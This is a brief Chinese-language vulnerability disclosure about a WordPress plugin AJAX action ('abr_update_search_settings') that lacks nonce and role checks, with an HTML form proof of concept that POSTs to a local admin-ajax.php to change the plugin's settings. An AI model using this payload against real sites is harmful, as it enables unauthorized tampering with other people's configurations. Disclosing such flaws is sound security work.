由于没有对AJAX异常函数调用进行NONCE的验证和角色权限的判断,从而导致了任意用户未经授权的函数调用导致配置更新
POC如下:
< html>
< body>
< form action="http://localhost/new/wp-admin/admin-ajax.php?action=abr_update_search_settings" method="POST" enctype="multipart/form-data">
< input type="hidden" name="value" value="200">
< input type="submit" name="Submit">
< /form>
< /body>
< /html>
从而导致修改了插件的配置